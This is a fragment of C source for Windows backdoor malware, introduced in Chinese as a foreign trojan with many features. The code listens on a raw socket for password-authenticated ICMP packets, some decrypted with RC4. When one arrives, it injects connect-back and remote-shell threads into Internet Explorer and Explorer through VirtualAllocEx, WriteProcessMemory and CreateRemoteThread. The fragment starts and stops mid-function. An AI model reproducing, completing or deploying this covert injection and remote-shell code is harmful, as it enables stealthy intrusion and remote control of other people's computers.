inject.h

一个外国的木马哦,功能挺多的

	if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pWriteShellTParam,IIEp->lclpWriteShellTParam, sizeof(WriteShellTParam), 0 ) )return 0;
	if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pReadShellTParam,IIEp->lclpReadShellTParam, sizeof(ReadShellTParam), 0 ) )return 0;

	//IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);

	if(!IIEp->pCreateRemoteThread(IIEp->ie, 0, 0, (DWORD (__stdcall *)( void *)) IIEp->pIConnectThread, IIEp->pConnectParam, 0, &IIEp->rc )) return 0;

//	IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);

return 0;
}
static void EndIStartInjectIEThread(void)
{
}
DWORD WINAPI SniffPackets(SniffParam *sp)
{
//	sp->husr32 = sp->pLoadLibrary(sp->szuser32dll);
	sp->hwinsock = sp->pLoadLibrary(sp->szWs232 );
	sp->hk32 =sp->pLoadLibrary( sp->szkernel32dll);
	sp->hAdvapi =sp->pLoadLibrary( sp->szAdvapi32);
	if((sp->hk32==0)||(sp->hk32==0)) return 1;

//	sp->pMBox= (tMBox)sp->pGetProcAddress(sp->husr32,sp->szMessageBoxA );
	sp->pSleep = (tSleep)sp->pGetProcAddress(sp->hk32,sp->szSleep );
	sp->plstrcpy=(tlstrcpy)sp->pGetProcAddress(sp->hk32,sp->szlstrcpy );
	sp->plstrcmp=(tlstrcmp)sp->pGetProcAddress(sp->hk32,sp->szlstrcmp );
	
	
//	sp->pCreateFile=(tCreateFile)sp->pGetProcAddress(sp->hk32,sp->szCreateFile);
//	sp->pWriteFile=(tWriteFile)sp->pGetProcAddress(sp->hk32,sp->szWriteFile);
//	sp->pSetFilePointer=(tSetFilePointer)sp->pGetProcAddress(sp->hk32,sp->szSetFilePointer);
	sp->pinet_ntoa=(tinet_ntoa)sp->pGetProcAddress(sp->hwinsock,sp->szinet_ntoa);
	

	sp->pWSAStartup=(tWSAStartup)sp->pGetProcAddress( sp->hwinsock, sp->szWSAStartup);
	sp->psocket=(tsocket)sp->pGetProcAddress(sp->hwinsock, sp->szsocket );
	sp->pbind=(tbind)sp->pGetProcAddress( sp->hwinsock,sp->szbind);
	sp->precv=(trecv)sp->pGetProcAddress( sp->hwinsock, sp->szrecv);
	sp->pWSAIoctl=(tWSAIoctl)sp->pGetProcAddress( sp->hwinsock,sp->szWSAIoctl);
	if((sp->pSleep==0)||(sp->pWSAStartup==0)||(sp->psocket==0)||(sp->pbind==0)||(sp->precv==0)||(sp->pWSAIoctl==0))
	return 1;
	sp->pCryptAcquireContext=(tCryptAcquireContext)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptAcquireContext);
	sp->pCryptCreateHash=(tCryptCreateHash)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptCreateHash);
	sp->pCryptHashData=(tCryptHashData)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptHashData);
	sp->pCryptDeriveKey=(tCryptDeriveKey)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDeriveKey);
	sp->pCryptDecrypt=(tCryptDecrypt)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDecrypt);
	sp->pCryptDestroyKey=(tCryptDestroyKey)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptDestroyKey);
	sp->pCryptDestroyHash=(tCryptDestroyHash)sp->pGetProcAddress(sp->hAdvapi,sp->szCryptDestroyHash);
	sp->pCryptReleaseContext=(tCryptReleaseContext)sp->pGetProcAddress( sp->hAdvapi,sp->szCryptReleaseContext);
	sp->plstrlen=(tlstrlen)sp->pGetProcAddress(sp->hk32,sp->szlstrlen);

	sp->pOpenProcessToken=(tOpenProcessToken)sp->pGetProcAddress(sp->hAdvapi,sp->szOpenProcessToken);
	sp->pLookupPrivilegeValue=(tLookupPrivilegeValue)sp->pGetProcAddress(sp->hAdvapi,sp->szLookupPrivilegeValue);
	sp->pAdjustTokenPrivileges=(tAdjustTokenPrivileges)sp->pGetProcAddress(sp->hAdvapi,sp->szAdjustTokenPrivileges);
	sp->pCloseHandle=(tCloseHandle)sp->pGetProcAddress(sp->hk32,sp->szCloseHandle);
//	sp->pGetCurrentProcess=(tGetCurrentProcess)sp->pGetProcAddress(sp->hk32,sp->szGetCurrentProcess);
	if((sp->pOpenProcessToken==0)||(sp->pLookupPrivilegeValue==0)||(sp->pAdjustTokenPrivileges==0))
	return 1;
	


//enable Debug privilage
/*
	if ( !sp->pOpenProcessToken(sp->pGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &sp->hToken ) )
	{
	sp->pMBox(0,sp->szlstrlen,"1",MB_OK);
	return 0;
	}

	if (!sp->pLookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sp->sedebugnameValue ))
	{
	sp->pMBox(0,sp->szCloseHandle,"1",MB_OK);
	sp->pCloseHandle(sp->hToken);
	return 0;
	}

	sp->tkp.PrivilegeCount = 1;
	sp->tkp.Privileges[0].Luid =sp->sedebugnameValue;
	sp->tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	sp->pAdjustTokenPrivileges(sp->hToken, FALSE, &sp->tkp, sizeof sp->tkp, NULL, NULL );
	sp->pCloseHandle(sp->hToken );
*/
////start rutine
	sp->pWSAStartup(MAKEWORD(2,1),&sp->wsaData);
	sp->sock = sp->psocket(AF_INET, SOCK_RAW, IPPROTO_IP);
	sp->pbind(sp->sock, (SOCKADDR *)&sp->sa, sizeof(sp->sa));
	sp->pWSAIoctl(sp->sock, SIO_RCVALL, &sp->optval, sizeof(sp->optval), NULL, 0, &sp->dwBytesRet, NULL, NULL);

	while (1)
    {
	sp->pSleep(1);
	//sp->pZeroMemory((LPVOID)&sp->RcvBuf, sizeof(sp->RcvBuf));
	sp->precv(sp->sock, sp->RcvBuf, sizeof(sp->RcvBuf), 0);
	IP_HDR *pIpheader;
	pIpheader = (IP_HDR *)sp->RcvBuf;
	//if(pIpheader->ip_protocol==IPPROTO_TCP)
	//sp->pMBox(0,sp->szrecv,sp->szrecv,MB_OK);

	if(pIpheader->ip_protocol==IPPROTO_ICMP)
	{		
	ECHOREQUEST *echoreg;
	echoreg=(ECHOREQUEST *)(sp->RcvBuf + 20);
	XData *xd=(XData *)&echoreg->cData;
	sp->saSource.sin_addr.s_addr = pIpheader->ip_srcaddr;	
	sp->Auth=FALSE;
	//sp->pMBox(0,sp->szlstrlen,echoreg->cData,MB_OK);	
	if((xd->start=='c')&&(xd->end=='c')){
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	sp->pConnectParam->Encrypt=FALSE;
	if(sp->plstrcmp(sp->szLocalPassword,xd->pass)==0) sp->Auth=TRUE;
	else sp->Auth=FALSE;
	}
	else{	
	if (sp->pCryptAcquireContext(&sp->hProv, NULL, sp->CSP, PROV_RSA_FULL, 0))
		{		
		//sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
			if (sp->pCryptCreateHash(sp->hProv, CALG_MD5, 0, 0, &sp->hHash))
			{
				sp->dwLength =sp->plstrlen(sp->szLocalPassword);
		//		sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
				if (sp->pCryptHashData(sp->hHash, (BYTE *)sp->szLocalPassword, sp->dwLength, 0))
				{
	//			sp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
				if (sp->pCryptDeriveKey(sp->hProv, CALG_RC4, sp->hHash, CRYPT_EXPORTABLE, &sp->hKey))
					{
						//sp->dwLength =sp->plstrlen(echoreg->cData);
						sp->dwLength =26;
						sp->pCryptDecrypt(sp->hKey, 0, TRUE, 0, (BYTE *)echoreg->cData, &sp->dwLength);
						sp->pCryptDestroyKey(sp->hKey);
						//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
					}

				}

				sp->pCryptDestroyHash(sp->hHash);
			}
			sp->pCryptReleaseContext(sp->hProv, 0);
	}//crypt end	
//	sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	if((xd->start=='c')&&(xd->end=='c')){ 
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
		sp->pConnectParam->Encrypt=TRUE;
		sp->Auth=TRUE;		
	}	
	}
	//sp->hf=sp->pCreateFile(sp->filename, GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
	//sp->pSetFilePointer(sp->hf,0 ,NULL,FILE_END);		
	//sp->pWriteFile(sp->hf,sp->pinet_ntoa(sp->saSource.sin_addr),16,&sp->dwBytes, NULL);
	//sp->pWriteFile(sp->hf,xd,32,&sp->dwBytes, NULL);
	//sp->pWriteFile (sp->hf, (LPVOID)sp->CR,2, &sp->dwBytes, NULL);
	//sp->pCloseHandle(sp->hf);	
	if(sp->Auth)
	{
	//sp->pMBox(0,xd->ip,echoreg->cData,MB_OK);
	sp->plstrcpy(sp->pConnectParam->host,xd->ip);
	sp->pConnectParam->port=xd->port;
	sp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(sp->pIStartInjectIEThread), (LPVOID) sp->pIEParam,0,&sp->rc);
//	sp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(sp->pIConnectThread), (LPVOID) sp->pConnectParam,0,&sp->rc);
	}
	}
    }//end while
return 0;
}
static void EndSniffPackets(void)
{
}
char localip[255];
char* GetLocalIP(){
	WORD wVersionRequested;
      WSADATA wsaData;
      char name[255];

      PHOSTENT hostinfo;
      wVersionRequested = MAKEWORD( 2, 0 );

      if ( WSAStartup( wVersionRequested, &wsaData ) == 0 )
      {

            if( gethostname ( name, sizeof(name)) == 0)
            {
                  if((hostinfo = gethostbyname(name)) != NULL)
                  {
                        lstrcpy(localip,  inet_ntoa (*(struct in_addr *)*hostinfo->h_addr_list));
                  }				 
            }

            WSACleanup( );
      }


    return localip;
}

BOOL InjectIntoExplorer( HANDLE h )
{
	HANDLE ht = 0;
	SniffParam lclsniffpar;
	SniffParam *orgsniffpar;
	ConnectParam lclconnectpar;
	ConnectParam *orgconnectpar;
	ReadShellTParam *orgreadshellpar;
	ReadShellTParam lclreadshellpar;
	WriteShellTParam *orgwriteshellpar;
	WriteShellTParam lclwriteshellpar;
	IEParam *orgieparam;
	IEParam lclieparam;
	void *preadshellthread = 0;
	void *pwriteshellthread = 0;
	void *psniffthread = 0;
	void *piconnecthread = 0;
	void *pIEStartInjectThread = 0;
	DWORD rc;
	HMODULE hlib;
	int SniffTCodeSize;
	int ConnectTCodeSize;
	int RShellTCodeSize;
	int WShellTCodeSize;
	int IEStartInjectCodeSize;
	//	Calculating size of Remote threads..

	unsigned long p1=(unsigned long )(PBYTE)EndSniffPackets;
	unsigned long p2=(unsigned long )(PBYTE)SniffPackets;
	SniffTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndISessionReadShellThread;
	p2=(unsigned long )(PBYTE)ISessionReadShellThread;
	RShellTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndISessionWriteShellThread;
	p2=(unsigned long )(PBYTE)ISessionWriteShellThread;
	WShellTCodeSize = (int)(p1-p2);
	p1=(unsigned long )(PBYTE)EndIConnectThread;
	p2=(unsigned long )(PBYTE)IConnectThread;
	ConnectTCodeSize = (int)(p1-p2);

	p1=(unsigned long )(PBYTE)EndIStartInjectIEThread;
	p2=(unsigned long )(PBYTE)IStartInjectIEThread;
	IEStartInjectCodeSize = (int)(p1-p2);

//  allocate memory for code
	do{
	psniffthread = VirtualAllocEx( h, 0, SniffTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( psniffthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
	break;
	}
	piconnecthread = VirtualAllocEx( h, 0, ConnectTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( piconnecthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}

	preadshellthread = VirtualAllocEx( h, 0, RShellTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( preadshellthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}
	pwriteshellthread = VirtualAllocEx( h, 0, WShellTCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( 	pwriteshellthread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
		break;
	}
	pIEStartInjectThread = VirtualAllocEx( h, 0, IEStartInjectCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( 	pIEStartInjectThread == 0 )
	{
	//MessageBox(0,"err1","",MB_OK);
	break;
	}
//////////////////////////////
// Allocate memory for data

	orgieparam = (IEParam  *) VirtualAllocEx( h, 0, sizeof(IEParam ), MEM_COMMIT, PAGE_READWRITE );
	if ( orgieparam == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}

	orgconnectpar = (ConnectParam *) VirtualAllocEx( h, 0, sizeof(ConnectParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgconnectpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}
	orgsniffpar = (SniffParam *) VirtualAllocEx( h, 0, sizeof(SniffParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgsniffpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}

	orgwriteshellpar = (WriteShellTParam *) VirtualAllocEx( h, 0, sizeof(WriteShellTParam), MEM_COMMIT, PAGE_READWRITE );
	if ( orgwriteshellpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);
		break;
	}
	orgreadshellpar = (ReadShellTParam *) VirtualAllocEx( h, 0, sizeof(ReadShellTParam), MEM_COMMIT, PAGE_READWRITE );
	if (orgreadshellpar == 0 )
	{
	//	MessageBox(0,"err2","",MB_OK);